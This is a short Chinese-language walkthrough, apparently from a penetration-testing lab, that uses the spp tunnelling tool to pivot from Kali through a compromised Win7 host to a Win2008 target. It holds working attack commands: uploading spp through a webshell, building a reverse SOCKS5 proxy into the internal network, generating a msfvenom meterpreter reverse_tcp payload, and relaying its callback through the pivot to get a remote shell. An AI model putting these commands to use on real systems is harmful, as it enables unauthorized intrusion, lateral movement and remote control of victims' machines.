下载地址 : https://github.com/esrrhs/spp
Kali:
启动服务端
./spp -type server -proto tcp -listen :8888 -proto ricmp -listen 0.0.0.0
WIN7 :
通过webshell 上传spp
先搭建个反向socks5代理,进入内网
./spp.exe -name "16" -type reverse_socks5_client -server 192.168.145.130:8888 -fromaddr :1080 -proxyproto tcp
WIN2008 :
MSF生成木马文件,上传木马文件 shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.143 LPORT=8888 -f exe > shell.exe
这里生成的IP是win7 跳板机的 8888端口
跳板机Win7运行spp tcp正向代理
./spp.exe -name "shiliu" -type proxy_client -server 192.168.145.130:8888 -fromaddr :8888 -toaddr :7777 -proxyproto tcp
Kali:
启动监听
win2008 :
运行shell.exe
Kali 获取shell